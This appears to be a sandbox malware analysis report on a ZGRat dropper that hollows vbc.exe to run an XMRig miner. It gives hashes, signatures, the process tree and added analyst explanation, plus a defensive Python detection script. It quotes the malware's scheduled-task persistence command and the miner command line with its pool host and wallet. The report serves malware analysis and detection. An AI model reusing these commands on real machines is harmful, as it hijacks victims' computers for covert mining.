Resubmissions
02-02-2024 11:51  240202-n1a66adbc3  10
Analysis
max time kernel: 120s
max time network: 140s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 02-02-2024 11:51
Behavioral task: behavioral1
Sample: tmp.exe
Resource: win7-20231215-en
General
Target: tmp.exe
Size: 4.3MB
MD5: dc101ebccce8a5d7f83b4b6ae5d49178
SHA1: 0e049dce0518d7f45077202de084610e51bc0ace
SHA256: 458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b
SHA512: 29749129569b804d12b4af4a2de8b3d8be104c915ac1061ce8cd8c9e33856f3e40ccc5fa121324aa5b70ce7582def95adf4c1e1a2177894ddbe10341a09b39b7
SSDEEP: 98304:k1CxiKNDAMrWXrm+G/Mul2rq/aReDkizMeQUD1:+CxiLOUr6/Mul2rVe4iwVUD1
Malware Config
Signatures
- Detect ZGRat V1 (5 IoCs)
  Processes (resource, yara_rule):
    behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp  family_zgrat_v1
    \ProgramData\SystemPropertiesDataExecutionPrevention\.exe  family_zgrat_v1
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  family_zgrat_v1
    behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp  family_zgrat_v1
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  family_zgrat_v1
- XMRig Miner payload (9 IoCs)
  Processes (resource, yara_rule):
    behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
    behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
- .NET Reactor protector (5 IoCs)
  Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
  Processes (resource, yara_rule):
    behavioral1/memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp  net_reactor
    \ProgramData\SystemPropertiesDataExecutionPrevention\.exe  net_reactor
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  net_reactor
    behavioral1/memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp  net_reactor
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  net_reactor
  The ZGRat and .NET Reactor rules hit the same five resources: the submitted sample in memory (PID 2376), the copy it drops under C:\ProgramData, and that copy's own process memory (PID 2696). The xmrig rule only hits the vbc.exe process (PID 2552), and only in the 0x140000000-0x1407DC000 range, which is the default image base of a 64-bit PE rather than anything vbc.exe itself would map.
- Executes dropped EXE (1 IoC)
  Processes (pid, process): 2696  .exe
- Loads dropped DLL (1 IoC)
  Processes (pid, process): 2764  cmd.exe
- yara_rule upx (15 IoCs)
  Processes (resource, yara_rule):
    behavioral1/memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral1/memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
- Uses the VBS compiler for execution (1 TTP)
- Suspicious use of SetThreadContext (1 IoC)
  Processes (pid, process, target pid, target process): 2696  .exe  set thread context of  2552  vbc.exe
  Read together with the WriteProcessMemory entries below (2696 wrote into 2552 seven times) and the xmrig/upx yara hits in 2552's memory at 0x140000000, this is process hollowing: the dropped .exe starts vbc.exe (the Visual Basic .NET compiler, a signed Microsoft binary), overwrites its memory with the UPX-packed XMRig image and redirects the main thread to it with SetThreadContext.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task "ERGVRDVMSK" re-launches the dropped .exe every 3 minutes with /RL HIGHEST (see the process tree), so killing the miner alone does not remove the infection.
- Delays execution with timeout.exe (1 IoC)
  Processes (pid, process): 2828  timeout.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid, process): 2696  .exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (token, pid, process):
    SeDebugPrivilege  2376  tmp.exe
    SeDebugPrivilege  2696  .exe
    SeLockMemoryPrivilege  2552  vbc.exe
    SeLockMemoryPrivilege  2552  vbc.exe
  SeLockMemoryPrivilege is the privilege XMRig requests to back its RandomX dataset with large pages; a compiler has no reason to ask for it.
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes (pid, process): 2552  vbc.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes (pid, process, target pid, target process):
    2376  tmp.exe  wrote to memory of  2764  cmd.exe  (x3)
    2764  cmd.exe  wrote to memory of  2828  timeout.exe  (x3)
    2764  cmd.exe  wrote to memory of  2696  .exe  (x3)
    2696  .exe  wrote to memory of  2588  cmd.exe  (x3)
    2588  cmd.exe  wrote to memory of  2728  schtasks.exe  (x3)
    2696  .exe  wrote to memory of  2552  vbc.exe  (x7)
  Every ordinary parent/child pair in this run shows three writes; the seven writes from 2696 into vbc.exe are the payload being placed.
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\tmp.exe (PID 2376)
  "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 2764)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat""
    Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\timeout.exe (PID 2828; parent per the WriteProcessMemory entries above)
      timeout 3
      Delays execution with timeout.exe
    - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe (PID 2696)
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (PID 2588)
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (PID 2728)
          schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          Creates scheduled task(s)
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (PID 2552)
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl
        Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
The chain is: dropper (tmp.exe) writes a batch file that sleeps 3 seconds and starts the copy in C:\ProgramData; that copy registers a scheduled task pointing at itself and then hollows vbc.exe with XMRig, whose command line carries the pool (fr-zephyr.miningocean.org:5342), the wallet, the worker name (work2) and the RandomX algorithm (rx/0). The file name ".exe" with an empty stem inside a directory named after a real Windows applet (SystemPropertiesDataExecutionPrevention) is chosen to look like system residue in file listings.
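The process tree above and the scheduled-task and SetThreadContext signatures describe one chain: dropper, batch delay, copy under C:\ProgramData, schtasks persistence, miner hollowed into vbc.exe. The following is an added example, not code from the sandbox or from the sample, that turns those observations into three generic checks and runs them over process-creation records constructed to mirror this report. The record schema (pid, ppid, image, cmdline), the rule names and the lists of hollowing hosts and user-writable paths are assumptions of the example, not anything the report defines; the PIDs, paths, wallet and command lines are the report's.

```python
"""Triage the dropper -> schtasks -> hollowed-miner chain with generic rules.

Added example, not code from the sandbox or the sample. RECORDS is constructed
to mirror the report's process tree; the field names (pid, ppid, image,
cmdline) are an assumed schema, not any vendor's event format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

WALLET = ("ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z"
          "78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z")  # wallet from the report's vbc.exe command line
DROP = r"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
TASK = r'schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "' + DROP + '"'

RECORDS = [  # constructed; PIDs, images and command lines as in the report
    dict(pid=2376, ppid=0, image=r"C:\Users\Admin\AppData\Local\Temp\tmp.exe",
         cmdline=r'"C:\Users\Admin\AppData\Local\Temp\tmp.exe"'),
    dict(pid=2764, ppid=2376, image=r"C:\Windows\system32\cmd.exe",
         cmdline=r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat""'),
    dict(pid=2828, ppid=2764, image=r"C:\Windows\system32\timeout.exe", cmdline="timeout 3"),
    dict(pid=2696, ppid=2764, image=DROP, cmdline='"' + DROP + '"'),
    dict(pid=2588, ppid=2696, image=r"C:\Windows\System32\cmd.exe",
         cmdline=r'"C:\Windows\System32\cmd.exe" /c ' + TASK),
    dict(pid=2728, ppid=2588, image=r"C:\Windows\system32\schtasks.exe", cmdline=TASK),
    dict(pid=2552, ppid=2696, image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
         cmdline=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u "
                 + WALLET + " -p work2 -a rx/0 --donate-level 1 --opencl"),
]

@dataclass
class Finding:
    pid: int
    rule: str
    detail: str

TOKEN_RE = re.compile(r'"([^"]*)"|([^\s"]+)')
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")  # assumption
# .NET build tools that are common hollowing hosts and never legitimately take pool arguments (assumption)
HOLLOWING_HOSTS = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe",
                   "installutil.exe", "aspnet_compiler.exe"}
SCHTASKS_FLAGS = {"/f", "/z", "/it", "/np"}  # schtasks switches that take no value
POOL_RE = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?[\w.-]+:\d{2,5}$")  # host:port, optional scheme

def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    return [q or b for q, b in TOKEN_RE.findall(cmdline) if q or b]

def parse_schtasks(cmdline: str) -> Optional[Dict[str, str]]:
    """Lower-cased /switch -> value map for a 'schtasks /create' line, else None."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    start = next((i for i, t in enumerate(low) if t == "schtasks" or t.endswith("schtasks.exe")), -1)
    if start < 0 or start + 1 >= len(low) or low[start + 1] != "/create":
        return None
    opts, i = {}, start + 2
    while i < len(toks):  # a switch consumes the next token unless it is a bare flag
        if low[i] in SCHTASKS_FLAGS or i + 1 >= len(toks) or low[i + 1].startswith("/"):
            opts[low[i]], i = "", i + 1
        else:
            opts[low[i]], i = toks[i + 1], i + 2
    return opts

def miner_args(cmdline: str) -> Optional[Dict[str, str]]:
    """Pool/wallet/algo/donate level from an XMRig-style command line; None without a pool."""
    toks = tokenize(cmdline)
    found: Dict[str, str] = {}
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t in ("-o", "--url") and POOL_RE.match(nxt):
            found["pool"] = nxt
        elif t in ("-u", "--user") and nxt:
            found["wallet"] = nxt
        elif t in ("-a", "--algo") and nxt:
            found["algo"] = nxt
        elif t.startswith("--donate-level"):
            found["donate_level"] = t.split("=", 1)[1] if "=" in t else nxt
    return found if "pool" in found else None

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def in_user_writable(path: str) -> bool:
    return any(p in path.lower() for p in USER_WRITABLE)

def schtasks_persistence(rec) -> Optional[Finding]:
    opts = parse_schtasks(rec["cmdline"])
    if not opts:
        return None
    why = []
    if opts.get("/rl", "").upper() == "HIGHEST":
        why.append("runs at highest privilege")
    if in_user_writable(opts.get("/tr", "")):
        why.append("target is in a user-writable directory")
    if opts.get("/sc", "").upper() == "MINUTE" and opts.get("/mo", "").isdigit() and int(opts["/mo"]) <= 5:
        why.append("re-launched every %s minute(s)" % opts["/mo"])
    if not why:
        return None
    return Finding(rec["pid"], "schtasks_persistence",
                   "task %s -> %s: %s" % (opts.get("/tn", "?"), opts.get("/tr", "?"), "; ".join(why)))

def hollowed_miner(rec) -> Optional[Finding]:
    args = miner_args(rec["cmdline"])
    if args is None:
        return None
    host = basename(rec["image"])
    rule = "miner_in_hollowing_host" if host in HOLLOWING_HOSTS else "miner_cmdline"
    return Finding(rec["pid"], rule, "%s mining at %s (algo %s)" % (host, args["pool"], args.get("algo", "?")))

def nameless_exe(rec) -> Optional[Finding]:
    """Executable whose file name is only an extension ('.exe') under a user-writable path."""
    if basename(rec["image"]).startswith(".") and in_user_writable(rec["image"]):
        return Finding(rec["pid"], "nameless_exe_in_user_writable_dir", rec["image"])
    return None

RULES = (schtasks_persistence, hollowed_miner, nameless_exe)

def analyze(records) -> List[Finding]:
    return [f for rec in records for rule in RULES for f in [rule(rec)] if f]

def chain(records, pid: int) -> List[int]:
    """PIDs from the root of the tree down to pid, so a finding reports its full ancestry."""
    by_pid = {r["pid"]: r for r in records}
    path = []
    while pid in by_pid:
        path.append(pid)
        pid = by_pid[pid]["ppid"]
    return path[::-1]

if __name__ == "__main__":
    for f in analyze(RECORDS):
        print(f.rule, "->".join(map(str, chain(RECORDS, f.pid))), f.detail, sep="  ")
```

The schtasks parser handles both the `cmd.exe /c schtasks ...` wrapper (PID 2588) and the direct `schtasks.exe` launch (PID 2728), so the same rule fires twice here, once per process, as the sandbox's own WriteProcessMemory chain shows. The miner rule is deliberately keyed on the pool argument rather than the wallet prefix, so it also catches variants that swap coins; the host list turns a plain miner hit into a hollowing hit when the image is a .NET build tool that has no business talking to a pool.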
Downloads
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  Filesize: 401KB
  MD5: e1a284509a6cd5f718465ebee993b028
  SHA1: 940889ce76300988888dc58998e017a0fd726871
  SHA256: f1942b7533b0244b709925ab95a5b3c61724f1caa0213c8e4afd21bdb71d4fde
  SHA512: 32de10be3e215a559dee6761933ba04043e34f81c9f6acd488afe6004de829c45dc8225c40faae89603abca6e53387bd663514ab9c6e3a2a42ded18a5907e787
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  Filesize: 405KB
  MD5: ee0ab1224b4b37861a10269da8a57f01
  SHA1: 7aebbbb8d9471898e0f24b081d90793c1ee4a826
  SHA256: b419a6d64bc1b7071b0064c4b831dbe8feed336ebe6ac505d4a432398434ebce
  SHA512: 22181ebd4fed26e6f1415b343eda1c9ecfcc0ac18279ea36b2f7549b00ef6f93aa58bc98596a22a1d32d61e2c70b374508bb2e7a0f7ea9d6f9ae8c901b06c9ee
- C:\Users\Admin\AppData\Local\Temp\tmp1333.tmp.bat
  Filesize: 168B
  MD5: ea3f1d3f2b8128afb86876e23163eabc
  SHA1: c5151eb68de092ae8f926e5f8e1e3905a09c5232
  SHA256: 279ae97563c6d9ba63b02f7cd66713c142b2f0a7208afac0d211e9b47372a172
  SHA512: 859177e14717c5babd076bd2166a073683e2c04cc7590052f0adc842dc50d826957f84cb126fcf4fc82988db32a1f8b8741fcc8049df6c6edc928c6ebb1a0917
- \ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  Filesize: 386KB
  MD5: de3d2a20b32c9ad0c537d5a04e447c6a
  SHA1: 64724b3978ece3f7174a0735d19de89302c0bba9
  SHA256: e0f3bb8ef7f9a0c1ab6301a714007e347c54bd0049a9a86d82f7bfd869dbf0f0
  SHA512: 64d38e3e459b8a12bce2f13b9ec1b5d4d097a34d9b5b8ce7b28663b4a5a82982640874e89e86660093ad4be4b72657798123cf33893483a713f23d862e7b9ec5
Memory dumps (resource, filesize):
- memory/2376-0-0x00000000001C0000-0x0000000000604000-memory.dmp  4.3MB
- memory/2376-2-0x000000001C500000-0x000000001C580000-memory.dmp  512KB
- memory/2376-3-0x0000000000140000-0x0000000000141000-memory.dmp  4KB
- memory/2376-14-0x000007FEF5700000-0x000007FEF60EC000-memory.dmp  9.9MB
- memory/2376-1-0x000007FEF5700000-0x000007FEF60EC000-memory.dmp  9.9MB
- memory/2552-23-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-35-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-46-0x00000000003E0000-0x0000000000400000-memory.dmp  128KB
- memory/2552-45-0x00000000003C0000-0x00000000003E0000-memory.dmp  128KB
- memory/2552-25-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-26-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp  4KB
- memory/2552-28-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-30-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-29-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-31-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-33-0x00000000000E0000-0x0000000000100000-memory.dmp  128KB
- memory/2552-32-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-44-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-43-0x00000000003E0000-0x0000000000400000-memory.dmp  128KB
- memory/2552-36-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-38-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-37-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-24-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-42-0x00000000003C0000-0x00000000003E0000-memory.dmp  128KB
- memory/2552-39-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-40-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2552-41-0x0000000140000000-0x00000001407DC000-memory.dmp  7.9MB
- memory/2696-19-0x0000000000820000-0x0000000000C64000-memory.dmp  4.3MB
- memory/2696-20-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmp  9.9MB
- memory/2696-34-0x000007FEF4D10000-0x000007FEF56FC000-memory.dmp  9.9MB
- memory/2696-21-0x000000001C130000-0x000000001C1B0000-memory.dmp  512KB
- memory/2696-22-0x0000000000540000-0x0000000000541000-memory.dmp  4KB